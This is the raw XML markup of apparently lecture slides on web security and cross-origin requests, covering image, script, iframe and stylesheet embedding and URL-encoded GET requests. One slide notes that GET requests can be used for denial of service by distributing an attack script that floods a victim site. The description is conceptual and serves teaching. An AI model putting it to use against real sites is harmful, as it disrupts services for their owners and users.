      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D3367AFC-55C2-4C87-A0F3-746A603194BC}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>&lt;</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>img</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>src</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>="http://</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>othersite.com</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>file.cgi?foo</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>=1&amp;bar=x y"&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E315B260-4660-4E34-90CE-6F6C76117815}" type="parTrans" cxnId="{0C205A6A-A660-4E29-B1FB-52997F5B7E3F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BF69DE89-AB31-4656-AD5F-E53395822904}" type="sibTrans" cxnId="{0C205A6A-A660-4E29-B1FB-52997F5B7E3F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DF5B47F9-E248-4FFF-BCF2-C98D49FEDA33}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>Browser sends</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E676555B-FC68-4682-BE3A-E797CC5BD6CA}" type="parTrans" cxnId="{D2C7C50F-7CEE-4AD7-9A75-FC5F9A734BEC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C72B44F-C831-4EEA-A508-2D56C297A8D8}" type="sibTrans" cxnId="{D2C7C50F-7CEE-4AD7-9A75-FC5F9A734BEC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D3B1356-90B0-4178-AA2E-5D8FF7F40851}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400"/>
            <a:t>Can’t send to some restricted ports</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E67DC912-86D1-4CF1-9352-C2B66D36AB99}" type="parTrans" cxnId="{C2B63815-748F-496E-8154-EC6C57AFB745}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B65BCB3D-1E8A-458C-B6FC-E9319178F0F2}" type="sibTrans" cxnId="{C2B63815-748F-496E-8154-EC6C57AFB745}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1B3B8117-DB92-44B2-86E1-6A7021709CEF}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800"/>
            <a:t>For example, port 25 (SMTP)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{915B475A-213F-48AC-8437-36F306C96A65}" type="parTrans" cxnId="{03C4AD72-1F36-4683-B885-26C6D1C31096}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{82887D5E-6F65-4D6F-8C43-BA930CD54D70}" type="sibTrans" cxnId="{03C4AD72-1F36-4683-B885-26C6D1C31096}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{98461F5D-F073-49F1-8122-11326CDBC5C7}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400"/>
            <a:t>Can use GET for denial of service (DoS) attacks</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{81B25A1D-2B6D-4E28-A881-E0C88F413F6B}" type="parTrans" cxnId="{0092E51F-821C-4DF7-AD8F-FE6B24D4E2E4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F79505FB-1BCB-4757-A842-732DC567290B}" type="sibTrans" cxnId="{0092E51F-821C-4DF7-AD8F-FE6B24D4E2E4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6DB87129-1532-448E-9C24-8E04674FCC69}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>Distribute attack script to issue many GETs to victim site</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{44BE27EE-9BBE-4C48-BAD7-FD9504849583}" type="parTrans" cxnId="{EF963353-E591-4259-8989-A8419F8D4055}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CBFD1DCF-EC07-444A-9688-BBA5AA4F1066}" type="sibTrans" cxnId="{EF963353-E591-4259-8989-A8419F8D4055}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8DC76DEE-FF48-3E43-BF1E-4DDF60FE3216}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>GET </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>file.cgi?foo</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>=1&amp;bar=x%20y HTTP/1.1 to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>othersite.com</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9061DD10-E83B-A642-89DA-58460BDDB852}" type="parTrans" cxnId="{FDEFFEA7-9F52-6B48-BDE2-7FD141B8F085}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65558DF8-918D-8841-A30A-D75931711DAB}" type="sibTrans" cxnId="{FDEFFEA7-9F52-6B48-BDE2-7FD141B8F085}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EC360E2C-10CF-0D40-B8D9-7DF299549DD7}" type="pres">
      <dgm:prSet presAssocID="{113C526E-8D22-42F6-9BC8-9522CE3CE920}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5BF7D12-B907-544F-A30D-447449F9C319}" type="pres">
      <dgm:prSet presAssocID="{C488B39B-5BA5-47E9-A760-BE856C7C01B6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51AB984F-B752-1147-AE8A-547001D5C2CF}" type="pres">
      <dgm:prSet presAssocID="{C488B39B-5BA5-47E9-A760-BE856C7C01B6}" presName="childText" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{66D2A76D-EB1D-394A-A811-28182070C079}" type="pres">
      <dgm:prSet presAssocID="{6D3B1356-90B0-4178-AA2E-5D8FF7F40851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36FA513D-BD1F-0C40-827F-3853CC19B153}" type="pres">
      <dgm:prSet presAssocID="{6D3B1356-90B0-4178-AA2E-5D8FF7F40851}" presName="childText" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7CAA10BC-1FA5-DA43-9FCE-9221EF31230E}" type="pres">
      <dgm:prSet presAssocID="{98461F5D-F073-49F1-8122-11326CDBC5C7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D5C56F91-811E-A540-AE78-36A22AEF62AA}" type="pres">
      <dgm:prSet presAssocID="{98461F5D-F073-49F1-8122-11326CDBC5C7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B0801E0B-466B-B74E-894F-90322B10EEBB}" type="presOf" srcId="{1B3B8117-DB92-44B2-86E1-6A7021709CEF}" destId="{36FA513D-BD1F-0C40-827F-3853CC19B153}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D2C7C50F-7CEE-4AD7-9A75-FC5F9A734BEC}" srcId="{C488B39B-5BA5-47E9-A760-BE856C7C01B6}" destId="{DF5B47F9-E248-4FFF-BCF2-C98D49FEDA33}" srcOrd="1" destOrd="0" parTransId="{E676555B-FC68-4682-BE3A-E797CC5BD6CA}" sibTransId="{5C72B44F-C831-4EEA-A508-2D56C297A8D8}"/>
    <dgm:cxn modelId="{C2B63815-748F-496E-8154-EC6C57AFB745}" srcId="{113C526E-8D22-42F6-9BC8-9522CE3CE920}" destId="{6D3B1356-90B0-4178-AA2E-5D8FF7F40851}" srcOrd="1" destOrd="0" parTransId="{E67DC912-86D1-4CF1-9352-C2B66D36AB99}" sibTransId="{B65BCB3D-1E8A-458C-B6FC-E9319178F0F2}"/>
    <dgm:cxn modelId="{0092E51F-821C-4DF7-AD8F-FE6B24D4E2E4}" srcId="{113C526E-8D22-42F6-9BC8-9522CE3CE920}" destId="{98461F5D-F073-49F1-8122-11326CDBC5C7}" srcOrd="2" destOrd="0" parTransId="{81B25A1D-2B6D-4E28-A881-E0C88F413F6B}" sibTransId="{F79505FB-1BCB-4757-A842-732DC567290B}"/>
    <dgm:cxn modelId="{0021D332-C21D-40E8-949F-502ADB312F07}" srcId="{113C526E-8D22-42F6-9BC8-9522CE3CE920}" destId="{C488B39B-5BA5-47E9-A760-BE856C7C01B6}" srcOrd="0" destOrd="0" parTransId="{C62E42DA-1D4E-4AF7-830C-B62AD98BD466}" sibTransId="{483AC843-2A7F-4078-8153-A8DD25FBB899}"/>
    <dgm:cxn modelId="{FB47C647-9C85-4343-A0EB-1FD43476ACA2}" type="presOf" srcId="{113C526E-8D22-42F6-9BC8-9522CE3CE920}" destId="{EC360E2C-10CF-0D40-B8D9-7DF299549DD7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EF963353-E591-4259-8989-A8419F8D4055}" srcId="{98461F5D-F073-49F1-8122-11326CDBC5C7}" destId="{6DB87129-1532-448E-9C24-8E04674FCC69}" srcOrd="0" destOrd="0" parTransId="{44BE27EE-9BBE-4C48-BAD7-FD9504849583}" sibTransId="{CBFD1DCF-EC07-444A-9688-BBA5AA4F1066}"/>
    <dgm:cxn modelId="{E1F80A65-C06F-6E45-BC5D-265FDBC81094}" type="presOf" srcId="{98461F5D-F073-49F1-8122-11326CDBC5C7}" destId="{7CAA10BC-1FA5-DA43-9FCE-9221EF31230E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{787AD866-BCC6-FD44-B482-709F8B5EBA45}" type="presOf" srcId="{C488B39B-5BA5-47E9-A760-BE856C7C01B6}" destId="{C5BF7D12-B907-544F-A30D-447449F9C319}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0C205A6A-A660-4E29-B1FB-52997F5B7E3F}" srcId="{C488B39B-5BA5-47E9-A760-BE856C7C01B6}" destId="{D3367AFC-55C2-4C87-A0F3-746A603194BC}" srcOrd="0" destOrd="0" parTransId="{E315B260-4660-4E34-90CE-6F6C76117815}" sibTransId="{BF69DE89-AB31-4656-AD5F-E53395822904}"/>
    <dgm:cxn modelId="{03C4AD72-1F36-4683-B885-26C6D1C31096}" srcId="{6D3B1356-90B0-4178-AA2E-5D8FF7F40851}" destId="{1B3B8117-DB92-44B2-86E1-6A7021709CEF}" srcOrd="0" destOrd="0" parTransId="{915B475A-213F-48AC-8437-36F306C96A65}" sibTransId="{82887D5E-6F65-4D6F-8C43-BA930CD54D70}"/>
    <dgm:cxn modelId="{8ADB2187-D910-9A4E-9245-DCE6B1F6D82C}" type="presOf" srcId="{6DB87129-1532-448E-9C24-8E04674FCC69}" destId="{D5C56F91-811E-A540-AE78-36A22AEF62AA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0F419B95-1F40-CC48-96E4-453B33FDDE9B}" type="presOf" srcId="{6D3B1356-90B0-4178-AA2E-5D8FF7F40851}" destId="{66D2A76D-EB1D-394A-A811-28182070C079}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FDEFFEA7-9F52-6B48-BDE2-7FD141B8F085}" srcId="{C488B39B-5BA5-47E9-A760-BE856C7C01B6}" destId="{8DC76DEE-FF48-3E43-BF1E-4DDF60FE3216}" srcOrd="2" destOrd="0" parTransId="{9061DD10-E83B-A642-89DA-58460BDDB852}" sibTransId="{65558DF8-918D-8841-A30A-D75931711DAB}"/>
    <dgm:cxn modelId="{CB8E55AD-7370-894D-853B-E2A14285F83B}" type="presOf" srcId="{D3367AFC-55C2-4C87-A0F3-746A603194BC}" destId="{51AB984F-B752-1147-AE8A-547001D5C2CF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{110AAEC0-4118-0747-A7F9-8F1F985D57FF}" type="presOf" srcId="{8DC76DEE-FF48-3E43-BF1E-4DDF60FE3216}" destId="{51AB984F-B752-1147-AE8A-547001D5C2CF}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{7B6653F7-5A4A-ED4F-BFA9-AD66BB7D04E0}" type="presOf" srcId="{DF5B47F9-E248-4FFF-BCF2-C98D49FEDA33}" destId="{51AB984F-B752-1147-AE8A-547001D5C2CF}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{744551E3-0564-254F-AAEA-39654346ACEA}" type="presParOf" srcId="{EC360E2C-10CF-0D40-B8D9-7DF299549DD7}" destId="{C5BF7D12-B907-544F-A30D-447449F9C319}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F060E33D-5396-A547-A203-DE4C4EAD2A4B}" type="presParOf" srcId="{EC360E2C-10CF-0D40-B8D9-7DF299549DD7}" destId="{51AB984F-B752-1147-AE8A-547001D5C2CF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{01A49A29-D996-AB40-92B5-A244E7274CC8}" type="presParOf" srcId="{EC360E2C-10CF-0D40-B8D9-7DF299549DD7}" destId="{66D2A76D-EB1D-394A-A811-28182070C079}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A5A120B0-9BE8-8B4F-B48A-4C13F1FB787C}" type="presParOf" srcId="{EC360E2C-10CF-0D40-B8D9-7DF299549DD7}" destId="{36FA513D-BD1F-0C40-827F-3853CC19B153}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C7AF9963-0FB0-5145-9E44-142B0D554505}" type="presParOf" srcId="{EC360E2C-10CF-0D40-B8D9-7DF299549DD7}" destId="{7CAA10BC-1FA5-DA43-9FCE-9221EF31230E}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{62FDB4A3-B1DA-0A46-B508-301D4B0A1817}" type="presParOf" srcId="{EC360E2C-10CF-0D40-B8D9-7DF299549DD7}" destId="{D5C56F91-811E-A540-AE78-36A22AEF62AA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86C92C-A1F4-D84E-9622-D303CEBFC238}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="8022"/>
          <a:ext cx="7815943" cy="5212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Scripts</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="25445" y="33467"/>
        <a:ext cx="7765053" cy="470345"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C2800F39-ED00-1C42-A421-478B94A9B2BB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="529257"/>
          <a:ext cx="7815943" cy="4471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8156" tIns="22860" rIns="128016" bIns="2286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None/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>&lt;script  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>src</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>=“//</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>site.com</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>script.js</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>”&gt;  &lt;/script&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="529257"/>
        <a:ext cx="7815943" cy="447120"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5ADB5407-C5E6-914C-AD86-83EF66517405}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="976377"/>
          <a:ext cx="7815943" cy="5212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Frames  </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="25445" y="1001822"/>
        <a:ext cx="7765053" cy="470345"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F22C851F-F44C-F742-AA3F-F857933F0C1B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1497612"/>
          <a:ext cx="7815943" cy="4471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8156" tIns="22860" rIns="128016" bIns="2286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None/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>&lt;iframe  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>src</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>=“//</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>site.com</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>frame.html</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>”&gt; &lt;/iframe&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1497612"/>
        <a:ext cx="7815943" cy="447120"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B891DFA2-2619-E24B-B213-796A388D07C5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1944733"/>
          <a:ext cx="7815943" cy="5212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Stylesheets (CSS)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="25445" y="1970178"/>
        <a:ext cx="7765053" cy="470345"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{86159C03-7AEA-384D-8A0B-0D9BCC343F64}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2465968"/>
          <a:ext cx="7815943" cy="4471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8156" tIns="22860" rIns="128016" bIns="2286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None/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>&lt;link </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>rel</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>=“stylesheet”  type="text/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>css</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>”  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>href</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>=“//</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>site.com</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>theme.css</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>" /&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2465968"/>
        <a:ext cx="7815943" cy="447120"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EABCF68C-1ECF-654B-AC03-AEEE5DE7A676}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2981023"/>
          <a:ext cx="7815943" cy="5212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Flash objects using </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0" err="1"/>
            <a:t>swfobject.js</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t> script (now obsolete)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="25445" y="3006468"/>
        <a:ext cx="7765053" cy="470345"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{60F8D499-6C6F-694E-A9B1-9E678EBA440C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3434323"/>
          <a:ext cx="7815943" cy="4471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8156" tIns="20320" rIns="113792" bIns="2032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None/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3434323"/>
        <a:ext cx="7815943" cy="44712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5BF7D12-B907-544F-A30D-447449F9C319}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="18667"/>
          <a:ext cx="6479180" cy="87984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Data must be URL encoded</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="42950" y="61617"/>
        <a:ext cx="6393280" cy="793940"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{51AB984F-B752-1147-AE8A-547001D5C2CF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="898507"/>
          <a:ext cx="6479180" cy="9972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5714" tIns="22860" rIns="128016" bIns="2286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kern="1200" dirty="0"/>
            <a:t>&lt;</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>img</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>src</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>="http://</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>othersite.com</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
